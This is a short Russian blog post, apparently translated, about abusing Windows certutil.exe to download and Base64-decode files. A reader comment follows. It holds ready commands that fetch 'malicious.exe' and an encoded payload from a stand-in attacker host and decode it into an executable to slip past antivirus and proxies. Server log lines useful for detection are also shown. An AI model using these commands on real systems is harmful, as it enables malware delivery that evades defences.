Операционная система Microsoft полна инструментов командной строки, которые помогают выполнять административные задачи. Некоторые из них можно легко установить, например, SysInternal suite [ 1 ] и psexec.exe, другие встроены в Windows и доступны для всех. Наличие вызовов на такие инструменты может помочь обнаружить подозрительное поведение. Зачем изобретать колесо, если инструмент certutil.exe может достичь того, что вам нужно? Цель этого инструмента - сбросить и отобразить информацию центра сертификации (CA), управлять сертификатами и ключами. Это инструмент командной строки, который принимает множество параметров [ 2 ]. Классическое использование certutil.exe заключается в том, чтобы легко обрабатывать кодированные данные Base64:
C:\Temp> certutil.exe -decode input.txt output.exe
Но можно использовать инструмент для выполнения важной задачи для злоумышленников: для извлечения данных из Интернета! Действительно, многие инструменты Microsoft могут извлекать онлайн-файл с использованием схемы URL (ftp: //, http: // и т. Д.). Я полагаю, вы уже знаете, что в каждом диалоговом окне, используемом для открытия / сохранения файла, вы можете указать URL-адрес:
.png)
Это точно то же самое с certutil.exe, который может извлекать данные из Интернета. Я заметил сценарий, который использует его таким образом. Вот пример загрузки:
C:\Temp> certutil.exe -urlcache -split -f "https://hackers.home/malicious.exe" bad.exe **** В сети **** 000000 ... 1056d0 CertUtil: команда -URLCache успешно выполнена.
Интересно, что инструмент делает два подключения к удаленному веб-серверу с использованием двух разных User-агентов. Вот выдержка из журналов веб-сервера:
10.xxx - - [03 / Apr / 2018: 21: 21: 11 +0200] "GET /malicious.exe HTTP / 1.1" 200 1077596 "-" "Microsoft-CryptoAPI / 10.0" 10.xxx - - [03 / Apr / 2018: 21: 21: 15 +0200] "GET /malicious.exe HTTP / 1.1" 200 1077540 "-" "Агент URL CertUtil"
Как насчет параметров командной строки?
- «-urlcache» используется для выполнения действий управления кешем URL.
- «-f» используется для принудительного извлечения указанного URL-адреса и обновления кеша.
- «-split» используется для выгрузки файла на диск.
Давайте объединим две функции: захватите текстовый файл с кодировкой Base64, чтобы обходить AV и прокси и декодировать его, чтобы легко удалить вредоносный exec в вашей цели:
C:\Temp> certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt C:\Temp> certutil.exe -decode bad.txt bad.exe
Таким образом, нет необходимости устанавливать curl или wget, certutil.exe доступен для этой основной функции!
фигня если на компьютере стоит антивирус то при создании вируса он спалит его) А даже если файл не палится протащить в обход Актив ИКС не получится привели бы пример с атакой а то только воду льете :)
ОтветитьУдалить